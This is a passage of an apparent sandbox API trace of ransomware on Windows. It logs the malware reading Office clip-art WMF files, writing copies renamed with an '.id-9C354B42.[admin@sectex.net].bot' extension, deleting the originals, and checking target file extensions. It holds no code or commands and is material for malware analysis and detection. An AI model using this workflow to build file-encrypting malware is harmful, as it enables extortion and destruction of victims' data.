	[0143.818] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\crane.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0143.819] GetLastError () returned 0x0
	[0143.819] ReadFile (in: hFile=0x2a0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x1496, lpOverlapped=0x0) returned 1
	[0143.821] WriteFile (in: hFile=0x388, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x14a0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x14a0, lpOverlapped=0x0) returned 1
	[0143.822] ReadFile (in: hFile=0x2a0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.822] WriteFile (in: hFile=0x388, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0143.822] SetEndOfFile (hFile=0x388) returned 1
	[0143.822] CloseHandle (hObject=0x388) returned 1
	[0143.822] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.823] SetEndOfFile (hFile=0x2a0) returned 1
	[0143.825] CloseHandle (hObject=0x2a0) returned 1
	[0143.825] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.825] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\crane.wmf")) returned 1
	[0143.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60
	[0143.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60
	[0143.826] lstrlenW (lpString=".doc") returned 4
	[0143.826] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.826] lstrlenW (lpString=".docx") returned 5
	[0143.826] lstrcmpiW (lpString1=".docx", lpString2="E.WMF") returned -1
	[0143.826] lstrlenW (lpString=".pdf") returned 4
	[0143.826] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.826] lstrlenW (lpString=".xls") returned 4
	[0143.826] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.826] lstrlenW (lpString=".xlsx") returned 5
	[0143.826] lstrcmpiW (lpString1=".xlsx", lpString2="E.WMF") returned -1
	[0143.826] lstrlenW (lpString=".ppt") returned 4
	[0143.826] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60
	[0143.826] lstrlenW (lpString=".zip") returned 4
	[0143.826] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.826] lstrlenW (lpString=".rar") returned 4
	[0143.826] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.826] lstrlenW (lpString=".bz2") returned 4
	[0143.826] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.826] lstrlenW (lpString=".7z") returned 3
	[0143.826] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60
	[0143.826] lstrlenW (lpString=".dbf") returned 4
	[0143.826] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60
	[0143.827] lstrlenW (lpString=".1cd") returned 4
	[0143.827] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60
	[0143.827] lstrlenW (lpString=".jpg") returned 4
	[0143.827] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60
	[0143.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60
	[0143.827] lstrlenW (lpString=".doc") returned 4
	[0143.827] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.827] lstrlenW (lpString=".docx") returned 5
	[0143.827] lstrcmpiW (lpString1=".docx", lpString2="E.WMF") returned -1
	[0143.827] lstrlenW (lpString=".pdf") returned 4
	[0143.827] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.827] lstrlenW (lpString=".xls") returned 4
	[0143.827] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.827] lstrlenW (lpString=".xlsx") returned 5
	[0143.827] lstrcmpiW (lpString1=".xlsx", lpString2="E.WMF") returned -1
	[0143.827] lstrlenW (lpString=".ppt") returned 4
	[0143.827] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60
	[0143.827] lstrlenW (lpString=".zip") returned 4
	[0143.827] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.827] lstrlenW (lpString=".rar") returned 4
	[0143.827] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.827] lstrlenW (lpString=".bz2") returned 4
	[0143.827] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.827] lstrlenW (lpString=".7z") returned 3
	[0143.827] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60
	[0143.827] lstrlenW (lpString=".dbf") returned 4
	[0143.827] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60
	[0143.827] lstrlenW (lpString=".1cd") returned 4
	[0143.827] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60
	[0143.828] lstrlenW (lpString=".jpg") returned 4
	[0143.828] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.828] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.828] lstrlenW (lpString="CUPINST.WMF") returned 11
	[0143.828] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cupinst.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0143.830] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=10326) returned 1
	[0143.830] CloseHandle (hObject=0x2a0) returned 1
	[0143.830] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cupinst.wmf")) returned 0x20
	[0143.830] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cupinst.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.831] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cupinst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0143.831] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.831] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.831] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cupinst.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0143.831] GetLastError () returned 0x0
	[0143.831] ReadFile (in: hFile=0x2a0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x2856, lpOverlapped=0x0) returned 1
	[0143.834] WriteFile (in: hFile=0x388, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x2860, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x2860, lpOverlapped=0x0) returned 1
	[0143.835] ReadFile (in: hFile=0x2a0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.835] WriteFile (in: hFile=0x388, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0143.835] SetEndOfFile (hFile=0x388) returned 1
	[0143.835] CloseHandle (hObject=0x388) returned 1
	[0143.835] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.835] SetEndOfFile (hFile=0x2a0) returned 1
	[0143.839] CloseHandle (hObject=0x2a0) returned 1
	[0143.840] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.840] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cupinst.wmf")) returned 1
	[0143.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62
	[0143.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62
	[0143.840] lstrlenW (lpString=".doc") returned 4
	[0143.840] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.840] lstrlenW (lpString=".docx") returned 5
	[0143.840] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1
	[0143.840] lstrlenW (lpString=".pdf") returned 4
	[0143.840] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.841] lstrlenW (lpString=".xls") returned 4
	[0143.841] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.841] lstrlenW (lpString=".xlsx") returned 5
	[0143.841] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1
	[0143.841] lstrlenW (lpString=".ppt") returned 4
	[0143.841] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.841] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62
	[0143.841] lstrlenW (lpString=".zip") returned 4
	[0143.841] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.841] lstrlenW (lpString=".rar") returned 4
	[0143.841] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.841] lstrlenW (lpString=".bz2") returned 4
	[0143.841] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.841] lstrlenW (lpString=".7z") returned 3
	[0143.841] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.841] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62
	[0143.841] lstrlenW (lpString=".dbf") returned 4
	[0143.841] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.841] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62
	[0143.841] lstrlenW (lpString=".1cd") returned 4
	[0143.841] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.841] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62
	[0143.841] lstrlenW (lpString=".jpg") returned 4
	[0143.841] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.841] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62
	[0143.841] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62
	[0143.841] lstrlenW (lpString=".doc") returned 4
	[0143.841] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.841] lstrlenW (lpString=".docx") returned 5
	[0143.841] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1
	[0143.841] lstrlenW (lpString=".pdf") returned 4
	[0143.841] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.842] lstrlenW (lpString=".xls") returned 4
	[0143.842] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.842] lstrlenW (lpString=".xlsx") returned 5
	[0143.842] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1
	[0143.842] lstrlenW (lpString=".ppt") returned 4
	[0143.842] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.842] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62
	[0143.842] lstrlenW (lpString=".zip") returned 4
	[0143.842] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.842] lstrlenW (lpString=".rar") returned 4
	[0143.842] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.842] lstrlenW (lpString=".bz2") returned 4
	[0143.842] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.842] lstrlenW (lpString=".7z") returned 3
	[0143.842] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.842] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62
	[0143.842] lstrlenW (lpString=".dbf") returned 4
	[0143.842] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.842] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62
	[0143.842] lstrlenW (lpString=".1cd") returned 4
	[0143.842] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.842] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62
	[0143.842] lstrlenW (lpString=".jpg") returned 4
	[0143.842] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.842] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.842] lstrlenW (lpString="DD00117_.WMF") returned 12
	[0143.842] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00117_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0143.845] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=31122) returned 1
	[0143.845] CloseHandle (hObject=0x388) returned 1
	[0143.845] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00117_.wmf")) returned 0x20
	[0143.845] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00117_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.846] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00117_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0143.846] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.846] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.846] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00117_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0143.846] GetLastError () returned 0x0
	[0143.846] ReadFile (in: hFile=0x388, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x7992, lpOverlapped=0x0) returned 1
	[0143.853] WriteFile (in: hFile=0x2a0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x79a0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x79a0, lpOverlapped=0x0) returned 1
	[0143.855] ReadFile (in: hFile=0x388, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.855] WriteFile (in: hFile=0x2a0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.855] SetEndOfFile (hFile=0x2a0) returned 1
	[0143.855] CloseHandle (hObject=0x2a0) returned 1
	[0143.855] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.855] SetEndOfFile (hFile=0x388) returned 1
	[0143.858] CloseHandle (hObject=0x388) returned 1
	[0143.858] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.858] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00117_.wmf")) returned 1
	[0143.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63
	[0143.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63
	[0143.859] lstrlenW (lpString=".doc") returned 4
	[0143.859] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.859] lstrlenW (lpString=".docx") returned 5
	[0143.859] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.859] lstrlenW (lpString=".pdf") returned 4
	[0143.859] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.859] lstrlenW (lpString=".xls") returned 4
	[0143.859] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.859] lstrlenW (lpString=".xlsx") returned 5
	[0143.859] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.859] lstrlenW (lpString=".ppt") returned 4
	[0143.859] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63
	[0143.859] lstrlenW (lpString=".zip") returned 4
	[0143.859] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.859] lstrlenW (lpString=".rar") returned 4
	[0143.859] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.859] lstrlenW (lpString=".bz2") returned 4
	[0143.859] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.859] lstrlenW (lpString=".7z") returned 3
	[0143.859] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63
	[0143.859] lstrlenW (lpString=".dbf") returned 4
	[0143.859] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63
	[0143.859] lstrlenW (lpString=".1cd") returned 4
	[0143.859] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63
	[0143.859] lstrlenW (lpString=".jpg") returned 4
	[0143.859] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63
	[0143.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63
	[0143.860] lstrlenW (lpString=".doc") returned 4
	[0143.860] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0143.860] lstrlenW (lpString=".docx") returned 5
	[0143.860] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0143.860] lstrlenW (lpString=".pdf") returned 4
	[0143.860] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0143.860] lstrlenW (lpString=".xls") returned 4
	[0143.860] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0143.860] lstrlenW (lpString=".xlsx") returned 5
	[0143.860] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0143.860] lstrlenW (lpString=".ppt") returned 4
	[0143.860] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0143.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63
	[0143.860] lstrlenW (lpString=".zip") returned 4
	[0143.860] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0143.860] lstrlenW (lpString=".rar") returned 4
	[0143.860] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0143.860] lstrlenW (lpString=".bz2") returned 4
	[0143.860] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0143.860] lstrlenW (lpString=".7z") returned 3
	[0143.860] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0143.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63
	[0143.860] lstrlenW (lpString=".dbf") returned 4
	[0143.860] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0143.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63
	[0143.860] lstrlenW (lpString=".1cd") returned 4
	[0143.860] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0143.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00117_.WMF") returned 63
	[0143.860] lstrlenW (lpString=".jpg") returned 4
	[0143.860] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0143.861] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0143.861] lstrlenW (lpString="DD00121_.WMF") returned 12
	[0143.861] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00121_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0144.117] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=8256) returned 1
	[0144.117] CloseHandle (hObject=0x3c0) returned 1
	[0144.149] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00121_.wmf")) returned 0x20
	[0144.150] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00121_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.163] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00121_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0144.163] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.163] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
